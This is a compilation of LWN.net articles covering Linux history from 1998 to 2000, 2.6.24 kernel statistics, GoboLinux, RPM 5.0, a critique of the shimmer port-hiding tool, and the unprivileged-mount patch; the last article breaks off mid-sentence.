     Red Hat 5.1 is released.

 July 16, 1998: KDE 1.0 is
     released; KDE v. GNOME flamewars spread across numerous mailing lists
     and web sites.

 July 23, 1998: Oracle ports
     some of its products to Linux.  
     Linus decrees
     that 8MB of memory will be needed for the 2.2 kernel.


The Oracle announcement seems mundane now, but the existence of Oracle
products for Linux was a specific indicator that many people were looking
for.  It was an indication that Linux was a "serious" platform.  Richard
Stallman, of course, thought that Oracle's announcement was terrible news. 


 July 30, 1998: Debian 2.0 is
     released.  Rumors circulate that IBM is considering Linux.
     Linux-Mandrake is launched. 

 August 13, 1998: the Open
     Source Initiative is launched, flame wars result.  Richard Stallman
     calls for free
     documentation for free software.  The kernel goes into a "hard code
     freeze" - not the first or last time that a Linus-decreed freeze would
     prove to be less hard than anticipated.  The devfs discussion
     continues.  Red Hat states that it 
     cannot legally ship Qt or KDE.

 August 20, 1998: Red Hat
     launches Rawhide.  Bruce Perens bails out of the Linux Standard Base
     effort. 

 October 1, 1998:
     Intel and Netscape (and two venture capital firms) invest in Red Hat.
     Also notable this week was the first of the big "Linus burnout"
     episodes, making it clear that something in the kernel development
     process needed to change.


Let us now pause for a moment.  From this distance, it may be hard to
appreciate just how big the news of the Red Hat investments was.  For all
that had happened, Linux was still a somewhat obscure phenomenon, unknown
to much of the information technology world.  When Intel put money into Red
Hat, it became clear to all that both Linux and Red Hat were headed toward
success.  This was, in some real sense, the point where Linux entered the
dotcom bubble, though the real action was still a year away.


The 2.1.123 release failed to compile as a result of some merging errors;
developers got upset about the state of affairs and a long, inflammatory
discussion resulted.  Linus stormed out of the virtual room and took a
vacation.  It was a somewhat scary series of events which foreshadowed more
to come; getting the kernel development process to scale as the community
grew was a multi-year process.


During this time, LWN was also growing in both readership and size; it was taking
increasing amounts of time.  We eventually had to move the server from its
initial location (behind an ISDN line in your editor's basement) to a
proper hosting facility.  But, remember, LWN was not the main endeavor;
it was an attention attractor for the support services offered by Eklektix,
Inc.  This business plan was not going particularly well.  Those who dealt
with Red Hat in that era know that, as a company, it was a rather chaotic
place.  The marketing for the support partners never happened, and the
backup services for the support plans the partners were able to sell
themselves were, shall we say, less than the customers thought they
deserved given what they had paid.  The support partner program was not
a big success for anybody involved.


As a result, one of the first things Red Hat did with its new pile of cash
was to cancel this program and start building its own, internal support
operation.  Eklektix continued to push its own support offerings for a
while, but the fact of the matter is that it was not a fun business: it
seemed to mostly consist of cleaning up after low-budget ISPs which could
not be bothered to install security updates.  So the search for
alternatives began.  Meanwhile:


 October 16, 1998:
     Larry McVoy contacts LWN and describes his upcoming "BitKeeper"
     software as a way of making Linus "scale".  Debian takes an official position
     against KDE.

 November 5, 1998: The
     Halloween Memo.

 November 19, 1998: The Qt
     library becomes available under the new QPL, eliminating roadblocks
     for the distribution of KDE.  VA Research (also known as VA
     Linux VA Software SourceForge) gets a big
     venture capital infusion.  Red Hat hires Matthew Szulik as CEO.

 The first LWN
     Linux timeline was released at the end of 1998.

 January 28, 1999: LWN's first
     anniversary.  The 2.2 kernel is released, complete with a
     trivially-exploited security hole.  Linus decrees that
     32-bit Linux will never support more than 2GB of memory.
     The TCP-wrappers
     distribution is compromised.  The Windows refund movement gathers
     steam. 

 February 11, 1999: perhaps the
     first big discussion of binary-only modules.

 February 25, 1999: IBM
     announces support for Red Hat Linux on its systems.


About this time, Eklektix announced that its new line of business would be
training - and Linux system administration training in particular.  The
announcement was timed for the first ever LinuxWorld conference; both LWN
editors spoke there, with Jon delivering a system administration tutorial
to 450 attendees.  It was the start of a new phase - though it was not much
more successful than the one which came before.


If the investments in Red Hat were the beginning of the Linux bubble,
LinuxWorld was where the inflation began in earnest.  The amount of money
on display there was impressive to say the least.  The Red Hat party will
live forevermore in the memory (or lack of memory, as the case may be) of
all who attended.  LinuxCare, which was supposed to be the big
support success story for Linux, was unveiled at this conference.  Never
had there been so much overt commercial interest around Linux.


 March 25, 1999: It turns out
     that BitKeeper is to come out under a not-really-open-source license.


 April 8, 1999: Discouraged
     Mozilla developers resign from the project - there was a time when it
     seemed like a usable Mozilla browser would never come.  Dell buys a
     piece of Red Hat.  Al Gore claims to have an open source presidential
     campaign.  RMS battles for "GNU/Linux" on linux-kernel.

 April 15, 1999: the Mindcraft
     study.  It turned out that some of Mindcraft's criticisms were right,
     but we fixed the problems in a hurry.

 April 27, 1999: The last Linux
     Expo is held in Raleigh.  


It is interesting to note that, during this time, LWN got its first
acquisition offer: from Red Hat.  We turned it down: the terms of the offer
looked much like indentured servitude under firm Red Hat control.  But we
did work a deal with the company to supply news items for its portal site.
Yes, during this time, Red Hat's business model was aiming toward becoming
the dominant network portal for Linux-related information.  Remember, this
was 1999.


 June 10, 1999: Red Hat files 
     for its IPO.  VA Linux bulks up on free software developers.

 July 1, 1999: Slashdot is
     acquired by Andover.net.  Eric Raymond and Richard Stallman feud over
     "open source." 

 July 22, 1999: Red Hat gives
     Linux hackers an opportunity to buy pre-IPO stock.

 August 12, 1999: Red Hat goes
     public, with great success.  Andover acquires Freshmeat.net.  The
     second LinuxWorld conference is held.


The Red Hat IPO was the beginning of a new phase: clearly somebody was
making a lot of money from Linux, even if who wasn't exactly clear.  What
was clear is that Eklektix was not on the list.  When we planned out the
training offering, we had a set of spreadsheets with some truly wonderful
numbers on the income which was sure to result.  Somehow reality failed to
match the spreadsheets.  So we came to realize that we needed to look in
other directions.


At this time, advertising was beginning to bring in some actual money.
But, more to the point, as the market heated up, companies were showing
increasing amounts of interest in anybody who had any sort of Linux
credibility or mindshare.  We had some of that credibility at that time.
So we decided to see what would happen if we let the word out that LWN was
for sale.  Suffice to say that the result was a far wilder ride than we
could have ever anticipated.  But that will be the topic of next week's
installment.

		2.6.24 - some statistics


As of this writing, the 2.6.24 kernel is getting close to a release -
though there is likely to be one more -rc version to look at first.  The
rate of change has slowed significantly, though, and the final regressions
are being chased down.  So it seems like a suitable time to look at the
patches which went into this kernel and where they came from.

This is, in many ways, a record-breaking development cycle.  Over 10,000
individual changesets have been merged this time around, with a net growth
of almost 300,000 lines of code.  950 developers contributed this code; of
those, 358 contributed just one patch.  By comparison, the previous cycle
(2.6.23) merged some 6200 patches from about 860 developers.  Given that,
it's not surprising that the 2.6.24 cycle has been a little longer than
some of its predecessors.


Without further ado, here is the list of top contributors to this kernel:


By either method of counting, Thomas Gleixner comes out at the top of the
list by virtue of his work on the i386/x86_64 architecture merger.
Bringing those architectures together and making the result work well was a
huge job; this effort will continue into future development cycles.  (For
the curious, simply renamed files were not counted as "changed lines" in
the generation of these numbers).  Note that many of these patches also
carry a signoff by Ingo Molnar, but git only stores the name of a single
"author" for a changeset.


Other contributors of large numbers of changesets in 2.6.24 include
Bartlomiej Zolnierkiewicz (lots of IDE driver patches), Adrian Bunk
(cleanups all over the kernel tree), Ralf Baechle (MIPS architecture work),
Pavel Emelyanov (mostly network and PID namespaces), Tejun Heo (serial ATA
and a number of sysfs cleanups), Johannes Berg (wireless networking), and
Al Viro (mostly annotation patches and related fixes).  If one looks at the
number of changed lines, the list of developers changes almost completely:
Zhu Yi (iwlwifi driver), Auke Kok (e1000 driver), Michael Buesch (wireless
networking and the b43 driver), Ivo van Doorn (rt2x00 wireless driver),
Matthew Wilcox (SCSI, especially advansys and sym53c8xx drivers), Adrian
Bunk (cleanups and code deletions), Larry Finger (mainly addition of the
b43 legacy driver), and David Miller (networking and SPARC64).


If one assigns developers' contributions to employers and totals the
results, the following numbers emerge (note that these tables have been
updated since initial publication to fix an error):


In many ways, these lists look similar to those posted for past kernels.
But there are a few things which jump out this time around:


 Intel has made it to the top of the "by lines changed" list - and 
     not just by a little bit.  This happened by virtue of the work done by
     four of the top-20 developers, but also by dozens of others who
     contributed to the 2.6.24 kernel.  Intel has a lot of people
     working on the kernel, many of whom spend little time in the
     limelight.

 Movial found its way onto the list
     for the first time as a result of having hired a very active
     developer.

 The amount of work done by people known to be hacking on their own
     time has grown a bit.  This change is mostly a result of more complete
     information on our side - many developers have moved out of the
     "unknown" category.  Quite a bit of the no-employer work this time
     around was done on the wireless networking tree; since much of the
     interesting work in this area currently involves reverse engineering,
     perhaps it is not surprising that relatively few companies are willing
     to sponsor it.


All told, some 130 distinct employers were identified for the contributors
to 2.6.24.  That is a lot of companies to be working on one body of code.


Looking at the Signed-off-by headers of patches is always interesting; if
one removes the signoffs added by the authors themselves, what is left is a
list of the gatekeepers - those who channel the code into the mainline.
The people who signed off on the most patches which they did not write are:


There are not a lot of changes here from previous development cycles.
While quite a few developers add signoffs to code and pass it on, they work
for a relatively small number of companies - 7 employers account for
70% of the non-author signoffs.


Finally, given that we are starting a new year, it is worth taking a quick
look back at the entirety of 2007.  In 2007, Linus merged just over 30,000
changesets (more than 80 per day, every day) from 1900 developers working
for (at least) 200 companies.  All
told, they changed over 2 million lines of code, growing the kernel by
more than 750,000 lines.  The kernel developers are, in other words,
touching over 5,000 lines of code every day - that is a high rate of
change.


The top contributors over the course of the year
(by changesets) were:


It should be noted that the employer numbers are more approximate than
usual.  Some developers changed employers in 2007, but LWN, as a matter of
policy, does not maintain a database of developers and their employers over
time.   Still, the picture is relatively constant - the same companies
continue to contribute approximately the same percentage of the patches
going into the kernel over relatively long periods of time.


Overall, the picture that results from all these numbers is one of a
widespread and healthy development community.  There appears to be no
shortage of jobs for kernel developers, but also room for those who work
outside of the office.  The kernel truly is a common resource, with
literally thousands of people working to improve it.  And it shows no signs
of slowing down anytime soon.


Your editor would like to profusely thank Greg Kroah-Hartman for his help
in improving these statistics.

		GoboLinux


GoboLinux is an alternative
distribution that redefines the entire filesystem hierarchy.  The
distribution joined the LWN Distributions List in late October 2003 at
version 007.  Now at version 014, the project has made quite a bit of
headway.  The website has been translated into several major languages,
along with much of the documentation.

An early article
written by GoboLinux creator Hisham Muhammad explains how the distribution
evolved from a custom Linux From
Scratch installation, and the motivation for changing the directory
structure.


The whole thing started when I had to install programs at the
University. As I had no write access to the standard Unix directories, I
created my own directories under $HOME the way I saw fit. I upgraded the
programs from source constantly, and couldn't use a package manager. My
solution was the most obvious one: to place each program in its own
directory, such as ~/Programs/AfterStep. Soon the environment variables
(PATH, LD_LIBRARY_PATH...) got bigger and bigger, so I created centralized
directories for each class of files, containing symbolic links:
~/Libraries, ~/Headers and so on. A natural evolution was to write shell
scripts to handle the links, configures and Makefiles.


I downloaded the 014 release and stuck the CD into my ancient Sony Vaio
laptop.  After booting I was first prompted for my preferred language and
keyboard settings and then taken to a console screen with text advising me
to "run startx to run the live CD or you can install from here."  I ran
startx and soon was looking at a familiar KDE desktop.  This release
features KDE 3.5.8, Glibc 2.5 and Xorg 7.2.  From here you'll find a
desktop icon for GParted and another to install GoboLinux, so you can
easily create a separate partition for GoboLinux before an installation.

I ran it as live CD and brought up a Konsole so I poke about the filesystem
hierarchy.  The home directory looks much like any other Linux system, but
a cd /, followed by ls -al reveals something else
entirely.  There are only six subdirectories here: Depot, Files, Mount,
Programs, System, and Users.  Depot proved to be empty, but the other
directories have their own subdirectories, which branch further as
necessary.  For example, I found everything need to compile the linux
kernel for a variety of architectures under
/Files/Compile/Sources/linux-2.6.23.8/ (the version used by this release).
To see all the installed programs just look at /Programs where each package
has it's own subdirectory.  Different versions of the packages can also be
easily installed without conflict, since the directory structure includes
the version number, e.g. /Programs/Xorg/7.2/.

The home directory for users is under /Users instead of /home, but it works
just the same.  As a long time Unix/Linux user I'm used to the old
hierarchy, with cryptic names like /etc and /bin.  I thought I might have a
hard time getting used to GoboLinux.  Instead, I found it intuitive and easy
to work with.  Next time you are looking for something different in a
desktop, give GoboLinux a try.

		The launch of RPM 5.0


Stable version 5.0.0 of RPM,
the rpm package manager, formerly known as the Red Hat package manager,
has  been announced.  RPM5
is a fork of RPM; it should not be confused with the version used by Red
Hat, Fedora, SUSE, and others, which can still be found at rpm.org. 

The project description states:


RPM is a powerful and mature command-line driven package management system
capable of installing, uninstalling, verifying, querying, and updating Unix
software packages. Each software package consists of an archive of files
along with information about the package like its version, a description,
and the like. There is also a library API, permitting advanced developers
to manage such transactions from programming languages such as C, Perl or
Python.

Traditionally, RPM is a core component of many Linux distributions, including Red Hat Enterprise Linux, Fedora, Novell SUSE Linux Enterprise, openSUSE, CentOS, Mandriva Linux, and many others. But RPM is also used for software packaging on many other Unix operating systems like FreeBSD, Sun OpenSolaris, IBM AIX and Apple Mac OS X through the cross-platform Unix software distribution OpenPKG. Additionally, the RPM archive format is an official part of the Linux Standard Base (LSB).


The RPM5 developers certainly have a high opinion of what this release
brings:


The relaunch of the
RPM project in spring 2007 and today's following availability of RPM 5
marks a major milestone for the previously rather Linux-centric RPM. RPM
now finally evolved into a fully cross-platform and reusable software
packaging tool.


RPM Version 5.0.0 differs in numerous ways from other versions.
As noted above, the project aims to be cross-platform.
Much of the code is said to have been cleaned up and numerous bugs have been fixed.
The RPM build process has been completely rewritten to improve portability.
The code base has been ported to all of the major UNIX-based platforms
and Windows.  All of the most widely used open-source and proprietary
compilers are now supported.  Supported compression formats now include
bzip, bzip2 and LZMA.  Initial support has been added for XAR, the XML
Archive file format, while support for the old RPMv3 format has been
removed.  New package specification features have been added
and RPM 5 can now automatically track vendor distribution files.


In the last several years, the RPM project has been plagued by a bit of
controversy.  The issues mainly centered around maintenance of the
code and which version was used by Red Hat.
In August, 2006, LWN asked
Who maintains RPM?
More recently, Ralf S. Engelschall from the OpenPKG distribution has posted a

blog entry that discusses the project's history and considers which
version is "official".  Lastly, the initial RPM 5.0.0 announcement
on LWN produced some lively
discussion of RPM issues.


The much-trumpeted release of RPM5 seems unlikely to put an end to this
controversy, to say the least.  RPM5 would appear to have a certain amount
of development energy and momentum, but it is not used by any major
distributions and it is not at all clear that this will change; in
particular, Red Hat and Fedora seem highly unlikely to drop their version
of RPM for RPM5.  So this fork - and the bad feelings that go along with it
- will probably persist indefinitely.  That's not what anybody would wish
for a crucial (and normally relatively boring) system tool like rpm.


		Hiding open ports with shimmer


Open TCP or UDP ports on an internet-facing host can be worrisome to an
administrator, they almost feel like an invitation to an
attacker.  If an unknown or unpatched vulnerability is running behind the
port, the host could be compromised.  Admins have come up with some
reasonable ways to deflect the simplest of these attacks: changing the
well-known port or port knocking.  The
new shimmer project provides
a twist, by using cryptographic techniques to choose the port to open.


The basic idea is that one port (within a chosen range) will be open to
real traffic of the service that the admin wants to hide – ssh or a private
web server for example.  The number of that port will be able to be
calculated by both client and server using a secret that they share.  A
client that connects to the proper port gets forwarded to the real
service.  In addition to the proper port, 15 other ports are opened and
connected to a blacklist service.  Any connection made to those ports will
result in the source IP address being banned for 15 minutes.  The server
redoes the calculation each minute, coming up with a new set of 16 ports
– one good and 15 bad.


In order to calculate the port number, the shared secret (key) is combined
with the time (to the nearest minute), and the name of the service, then hashed using SHA-256.  The hash is used as an AES
key to encrypt the numbers 0 through 15.  Those values are mapped into the
port range and serve as the 16 port numbers for that minute.  In order to
handle small clock variations between client and server, the server
actually keeps each set of 16 open for three minutes – adding the set
for the minutes before and after the current one.


While this seems like it provides a great deal of security to hide an open
port behind, in reality it is more showy than useful.  As with simple port
knocking, or changing the well-known port number, it is vulnerable to an
attacker that can monitor traffic to the server and observe successful
connections.  Shimmer leaves three ports wide open at any given time with
45 ports that will cause an IP to get blacklisted.  Depending on the size
of the port range chosen, the odds aren't that bad of randomly
guessing the right port.  Someone with few thousand IP addresses to use
probably won't have any difficulty.


Much like the other techniques, shimmer will likely deflect all but the most
determined of attackers, but is unlikely to provide much in the way of
a barrier against those.  It sounds attractive and uses cryptographic terms
and techniques which may make it seem more secure than it really is.  Using
it without understanding this could lead to a false sense of security.


		Ten-year timeline, part 2: the bubble days


Last week, we began a
multi-part series looking at the soon-to-be ten years of LWN.  At the end
of that episode, we were coming to the realization that the training
business was, perhaps, not going to perform quite as well as our
spreadsheets had suggested it might.  It turns out that spreadsheets
created with free software can be just as deceptive as those done with
proprietary programs - who would have ever guessed?  So we decided to look into whether it
might be possible to make some sort of deal with some other company -
preferably one with some money - to keep the show going.


Just how one might go about looking for such a deal is not immediately
obvious - especially if you're a bunch of technical people who have no clue
about how corporate acquisitions are done.  Somehow, hanging an "Acquire
Us!" sign on the front page did not quite seem like the right way to go.
After some thought, we decided that the best approach might be to just
quietly slip the word to a few people that we might be open to offers, then
sit back and see what happened.  As it turned out, that was all we needed
to do.  Much of the following story has never been told - but all of the
non-disclosure agreements have run out by now, so this seems like the right
time. 


Meanwhile, things were happening at a furious pace in the Linux community.


 August 26, 1999: Red Hat
     and Caldera get around to year-2000 compliance.  The 2.3.15 patch is
     "huge", touching all of 600 files (2.6.24 currently has changes to
     over 10,000 files).  The first
     Ottawa Linux Symposium concludes.

 September 2, 1999: Sun
     buys StarDivision, but uses its "community source license" for the
     code.  Red Hat shuts down "Red Hat Linux" vendors on Amazon.

 September 9, 1999: SCO
     (old SCO, mind you, not the current company) trashes Linux in Europe.
     Bruce Perens worries that Sun may be trying to grab control of the
     Linux desktop through its acquisition of StarDivision.  Disruptive
     changes in the "stable" 2.2 kernel upset users.

 September 16, 1999: the
     2.3 kernel goes into "feature freeze," with Linus predicting a release
     by the end of the year.  He neglected to specify which year, though.
     Cobalt networks files to go public.  LinuxOne - a company nobody had
     ever heard of - files to go public.  Andover.net (the company which
     had bought Slashdot) files to go public.  The first ext3 filesystem patches
     are released.


The 2.3 feature freeze is instructive - 2.4.0 was not released until
January, 2001 - 16 months after this "freeze" went into effect.  Over the
next months we'll see plenty of reasons for the delay in the 2.4.0 release;
Linus was famously not a great release manager.  But releases which failed
to arrive were the norm back in those days.  Free software was much like
proprietary software in that regard.  One has to look back to realize just
how much better we have gotten at getting software releases out in a
reasonable period of time.

The IPO filings were beginning to pile up - much to your editor's chagrin.
Actually reading those things is a painful chore, and we felt that
we needed to examine all of them.  The relative
newcomers out there may be wondering who that LinuxOne company is.  So were
we, at the time.  LinuxOne materialized out of thin air, slapped its name
onto a copy of Red Hat Linux, and called itself a Linux company.  They
clearly hoped to get in on the general mania and make a bunch of money
before people caught on - they nearly achieved it, too.


 September 30, 1999:
     Caldera spinoff Lineo gets going - remember Embedix and Embrowser?
     Red Hat drops LWN news from its web site.


Lineo got spun out of Caldera for a couple of apparent reasons: (1) to
isolate the DR-DOS lawsuit
which was being pursued against Microsoft, and (2) to 
try to double the number of public offerings.  The first objective was
achieved, and the suit was ultimately successful.  In the end, though,
Lineo still failed to get off the ground.


 October 7, 1999: Sun
     announces that it will be releasing the Solaris source code.  The
     OpenBSD project grabs the last freely-licensed version of ssh and
     starts the OpenSSH project.

 October 14, 1999:
     TurboLinux gets a big chunk of venture money.  SCO (old SCO) buys a
     chunk of the Linux Mall.  Crypto export rules in the U.S. begin to
     soften.  The devfs discussion continues.  SGI, VA Linux, and
     O'Reilly launch a commercialized version of the Debian distribution.
     VA Linux files for its IPO.  <!-- rss feed -->


Old-timers will remember the Linux Mall - that was the place, once upon a
time, where we bought our Linux CDs (and stuffed penguins too).  Yes, we
actually bought Linux on CD and waited for it to show up via mail, though
it may seem a little strange now.  The Linux Mall, and its founder Mark
Bolzern, were fixtures in the early days of Linux.  As Linux grew and
bandwidth increased, though, the Linux Mall was having a bit of a hard time
of it.  The name was famous, though, and the site got a lot of traffic, so
companies interested in getting into the Linux hype were interested in it.  


It may be getting a bit ahead of the story, but this is as good a place as
any to let it be known that one of the things that the Linux Mall wanted to
do with its new-found wealth was to acquire a media outlet like LWN.  It
was part of the bigger plan of creating a full-featured e-commerce "mall"
centered around Linux.  We considered the offer long and hard, but, in the
end, declined it.  Just as well: the Linux Mall missed the IPO boat and got
folded into EBIZ, which, in turn, eventually went bankrupt.  Had we taken
that path, there would be no LWN now.


 October 21, 1999:
     LinuxToday is acquired by Internet.com; co-founder Dave Whitinger leaves
     the building.  ATI announces that it will be releasing 3D programming
     information for its video adapters - the good news here is that it's
     finally getting around to doing that.

 November 4, 1999: DVD
     encryption is cracked and DeCSS is released.  The Y2K-related
     "windowing" patent threatens the kernel.  Burn all GIFs day.  The
     kernel gets past the longstanding 1GB limit on installed memory.  Slackware 7 (the
     successor to Slackware 4) is released.  The non-profit Red Hat Center
     for Open Source launches - and is never heard from again.

 November 11, 1999: Cobalt
     network goes public, shares begin trading at $130.

 November 18, 1999: The Linux
     Business Expo is held as part of the once-famous COMDEX event.  Red Hat
     acquires Cygnus.  BitKeeper is said to be getting closer to release.
     Mozilla hits milestone 11 and is said to be getting closer to
     release.  Advogato.org launches.


LWN has only rarely operated booths at conferences, but we did have one at
the Comdex Linux Business Expo.  For the curious, here's a picture from
the event featuring LWN editor Rebecca Sobol.  That week's LWN edition
was produced from that booth after the floor closed, under the watchful eye
of security guards who didn't think we should be there.  Your editor
remembers it as one of the coldest experiences of his life.  During the
show, we subjected to constant, highly-amplified screaming obnoxiousness from the
large booth being run by LinuxToday - the acquisition, it seemed, had put
that site onto a rather less dignified path.


The other thing LWN was doing at this event was talking with potential
suitors.  One of those was a company called Atipa, which was operating a large booth of
its own.  Atipa was a VA-style Linux box vendor with a grand plan for a
Linux portal site which would, eventually, be the place people went
for Linux information.  They thought that LWN would make a good
addition to that portal, and were pushing hard to make a deal.


We met a few times with Atipa's CEO, a charismatic man who told a good
story.  The company, he said, was going to outdo even the coming VA Linux IPO, which
was already clearly going to be big.  Along the way he was going to pick up
companies like Applix and open-source the ApplixWare office suite -
something which would have been nice at the time.  He stated flat out that
he was soon to be a billionaire, and that we could share in that bonanza.
It was quite the tale, but we tended to walk out of these meetings
believing every word of it.


With some distance, though, the glow always faded.  We wondered why our
visit to the company's headquarters revealed a building almost devoid of
people.  The magic "profit happens here" step in their plans seemed less
inevitable when looked at later. 
In the end, we did not take this deal.  Thereafter,  we received
(unverifiable) word that Atipa's 
investors started asking some harder questions and found that, perhaps,
they, too, had allowed themselves to be charmed more than they should
have.  Atipa rather abruptly found a new CEO, the IPO never happened, and
investors, presumably, lost their money.


Also at the Linux Business Expo, we met with some representatives from
O'Reilly.  They were getting the O'Reilly network off the ground, and
thought that LWN might make a good addition to it.  They eventually offered us
a deal (which looked more like a traditional angel investment than an
acquisition) and a network 
affiliation which would have given us a portion of the revenue from the ads
they sold.  Your editor, who has a lot of respect for the people at O'Reilly, has
always had a bit of regret at turning down this offer.  It was an
opportunity to get business advice from some very smart people.  But it
would almost certainly have been fatal to LWN once the advertising market
fell apart. 


Meanwhile, the acquisition of Cygnus by Red Hat led to a fair amount of
online worrying about whether Red Hat was set to take over Linux by virtue
of employing a number of GCC developers.  Such fears look a little silly
now, but they seemed real then.


 December 9, 1999:
     Andover.net goes public.  The kernel gets NUMA support (during a
     feature freeze, remember).
     Sun announces a Linux Java release, rolling over the "Blackdown" team
     which had been working on this release for years.

 December 12, 1999: VA
     Linux goes public, setting the record for the largest first-day gain
     in NASDAQ history.  Eric Raymond gets rich and
     lets us all know about it.
     The non-free BitKeeper license is revealed.  LinuxCare acquires the
     Puffin Group and gets another $32 million.  The Linux Capital Group
     launches; it starts by funding Progeny Linux.  Companies send out "we use
     Linux" press releases in an attempt to make their stock price go up.


The VA IPO was not just the peak of the Linux bubble - it could well be the
peak of the dotcom bubble as a whole.  It was not possible to watch that
stock rise to well over $300 a share on the first day and not be
overwhelmed by a sense of unreality.  Still, it seemed like no more than
what Linux deserved, and people somehow expected it to continue.


 January 6, 2000: Linux
     survives Y2K.  Red Hat buys Hell's Kitchen Software, does nothing with
     it.  VA Linux launches the SourceForge site.

 January 13, 2000: Caldera
     Systems (later to become SCO) files for its IPO.  The kernel gets a
     new block driver API and 32-bit UIDs - still during the feature freeze.

 January 20, 2000:
     LinuxCare files for its IPO.  Linus Torvalds shuts down the sale of a
     number of Linux-related domain names.  Secure Computing Corporation
     announces that it will be developing (what becomes) SELinux.  Enoch
     becomes Gentoo Linux.  TurboLinux completes another funding round.


Once upon a time, Caldera Systems was supposed to be among the biggest
winners in the distribution sector - they had the business connections and
the distribution channels.  "Linux for business" got the company far enough
to do an IPO, but not much beyond that.  This is, of course, the company
which eventually became the SCO Group.


Caldera was well overshadowed by LinuxCare, though.  The distribution
business always looked like a hard one to maintain over the long term -
that is why Red Hat was trying to be a web portal company.  Services were
going to be the real gold mine, and LinuxCare was going to be at the top of
the Linux support industry.  The company got money from left and right (a
funding round produced offers of ten times the target amount) and hired a
long list of well-known Linux hackers.


Need we say that LWN's editors paid a visit to LinuxCare during this time?
It was a hard time for LinuxCare to discuss acquisitions, since the IPO
process was already underway, but discuss they did.  So we went to the
famous San Francisco headquarters.  Your editor's memories from that day
are strong.  LinuxCare was filled with hundreds of people who all believed
they were on the way toward an IPO that would exceed even VA Linux; suffice
to say they were happy about the prospect.  Meanwhile, though, a couple
hundred of them were all working in a single not-very-large room called
"the barn"; it resembled, more than anything else, a school lunchroom
filled with long tables.  Everybody worked on a laptop because there was no
room in their tiny piece of table space for anything else.  They all
complained about having colds.  It looked awful.


LinuxCare's negotiator was an ex-fighter jet pilot who retained the "top 
gun" attitude.  When valuations were discussed, we were told that offering
LinuxCare's pre-IPO shares at $50-60 each was being generous to us.  Issues
like editorial control were not really even on the table.  In the end, we
turned this deal down, but with a feeling like we were throwing a winning
lottery ticket in the trash.  Of course, subsequent events showed that we
need not have worried about this particular missed opportunity.


 February 10, 2000:
     Real-time Linux turns out to be patented.  VA Linux acquires
     Andover.Net.  The KDE project moves to SourceForge.  Atipa acquires
     Enhanced Software Technologies.  The Linux Fund announces that it will
     be filing for an IPO.


The Andover.Net acquisition was announced at LinuxWorld in New York - LWN
was there, of course.  The initial deal included a massive pile of cash to
be handed to Andover.Net's shareholders, but people questioned that handout
to the extent that it eventually went away.  Andover.Net's owners had to content
themselves mostly with VA Linux shares, which, already, were worth considerably
less than they had been on IPO day.  In the end, Andover.Net turned out to
be a good buy for VA Linux, once it became clear that the Linux-installed
computer business was harder than it had looked.


We were approached by a VA executive at LinuxWorld to see if we were
interested in maybe being acquired sometime.  By then, though, we had so
many offers that we couldn't really give them all serious consideration.
So we did not pursue that opportunity.

But, at this event, we did talk with some representatives from ZDNet, who
were also looking for a Linux site to buy.  The offer they made was, by
far, the most generous of any.  By some reckoning, we should have taken it.
Certainly it would have come out better than most of the other options we
had.  But ZDNet would have exercised more editorial control than we would
have liked, and, being already a public company, it didn't offer that IPO
"pop" that we somehow thought was our due.  So we ended up not taking that
path. 


 February 17, 2000: devfs
     is merged into the mainline kernel.  Also merged is the "softnet" core
     networking rework.  Remember, the kernel is in a feature freeze.

 February 24, 2000: Eazel
     is founded with the goal of improving Linux usability.


To your editor, Eazel never made sense from the beginning.  There was,
truly, no revenue model.  Indeed, it seemed like a scam designed to draw
venture money for the purpose of writing Nautilus.  To that extent it
succeeded, but the investors cannot have been happy in the end.


 March 2, 2000: Atipa
     announces $30 million in investments.

 March 23, 2000: Caldera
     Systems goes public; its share price merely doubles.  The planned date
     for LinuxCare's IPO passes with no offering.

 April 4, 2000: Linuxcare's
     IPO is pushed back to April 24 - or so they say.  EBIZ acquires
     longtime Linux CD distributor InfoMagic.  Atipa Linux Solutions
     acquires DCG Computer Corp.  Sendmail Inc. gets $35 million in
     funding. 


This was the point where LWN announced that it had been acquired
by a company called Tucows.  We had, in fact, been talking with them for
some months, and had made the decision in February.  It took some time,
though, for the lawyers to hammer out the final agreement.  In the end, we
were probably exceedingly lucky: market conditions were going downhill in a
hurry by this point and, had the negotiations stretched out much longer,
Tucows might have started looking for reasons to back out of the deal.


Or maybe not.  We went with Tucows for a number of reasons, but at the top
of the list was that they were clearly smart and decent people who,
while arguably being carried away by the bubble like the rest of us,
clearly had a functioning business underneath it all.  Their acquisition of
LWN never yielded the benefits they were looking for, but the people at
Tucows always treated us well and we still count them as friends.  Perhaps
we were smart, or perhaps we were just very lucky, but, in retrospect, we
came out of a complex, high-stakes process having made what was probably
the best possible decision.


The Tucows acquisition made it possible for LWN editors Rebecca Sobol and
Forrest Cook to join as regular staff members.  It also positioned us
within a safe harbor for the dotcom crash, which was already in progress.
But the story of those years will be the subject of next week's
installment.

		Unprivileged mounts


There are a number of filesystem-related patches aimed at the upcoming
2.6.25 merge window; one of those is the unprivileged mount patch by
Miklos Szeredi.  This patch enables an unprivileged user process to call
the mount() system call and - in certain circumstances - have that
call actually succeed.  It could eventually lead to a situation where users
have more flexibility to create their own environments and the setuid
mount utility is no longer needed.


This patch adds a new field (uid) to the vfsmount
structure, allowing the kernel to keep track of the owner of a specific
filesystem mount.  The system administrator can give ownership of a
specific mount to a user with the new MNT_SETUSER flag.  A common
pattern might be to bind-mount a user's home directory on top of itself,
giving the user the ownership of that mount.  Once that
has been done, the user is allowed to freely mount other filesystems below
that mount point - with a couple of conditions:


 There is a system-wide limit on the number of allowed user mounts;
     once that limit is hit, no more unprivileged mounts will be allowed
     until somebody unmounts something.  The current patch has no provision
     for per-user or per-group mount limits, but such a feature would not
     be particularly hard to add should the need arise.

 The filesystem type must be marked as being safe for unprivileged
     mounts.  Miklos notes that a filesystem must go through "a thorough
     audit" before this flag can be set with any confidence.  The patch, as
     posted, marks the fuse filesystem (which allows for the creation of
     filesystems implemented in user space) as being safe; fuse was
     designed for this mode of operation in the first place.  Bind mounts
     are also allowed, with some additional conditions.


If the system allows the mount, the flags allowing for setuid and device
files will be forcibly cleared - unless the user has the requisite
capabilities anyway.  Users are allowed to unmount filesystems they own,
again without privilege, but cannot unmount any others.  Another new mount
flag (MNT_NOMNT) marks a specific filesystem as being the end of
the line - no unprivileged submounts are allowed below it.
The end result of


[PULL QUOTE: 
One might well wonder why this change to the mount() system call
is called for, given that users have been able to do unprivileged mounts
for years.
 END QUOTE]


all this should be a mechanism by which users can organize their filesystem
hierarchies without any need for administrative privileges, and without the
risk of compromising system security.


One might well wonder why this change to the mount() system call
is called for, given that users have been able to do unprivileged mounts
for years.  The answer is that the current mechanism has a couple of
